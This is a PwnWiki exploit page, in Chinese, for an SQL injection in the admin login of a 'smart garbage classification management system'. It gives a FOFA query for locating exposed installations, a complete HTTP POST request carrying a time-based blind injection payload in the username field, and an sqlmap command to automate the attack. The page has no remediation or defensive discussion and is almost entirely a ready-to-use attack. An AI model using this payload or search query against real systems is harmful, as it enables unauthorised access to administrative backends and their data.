智能垃圾分類管理系統 SQL注入漏洞

From PwnWiki
Revision as of 19:19, 21 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="智能垃圾分类管理系统" </pre> ==漏洞利用== 發送請求包 <pre> POST /ghc_master/data/action.admindata.php HTTP/1.1 Host: xxx.xxx.xxx.xxx...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

title="智能垃圾分类管理系统"

漏洞利用

發送請求包 

POST /ghc_master/data/action.admindata.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 96
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.62
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

do=adminlogin&username=admin' AND (SELECT 2847 FROM (SELECT(SLEEP(5)))trlL)-- sNmL&password=4224


Sqlmap: 

sqlmap -r sql.txt -p username
Retrieved from "https://pwnwiki.com/index.php?title=智能垃圾分類管理系統_SQL注入漏洞&oldid=3016"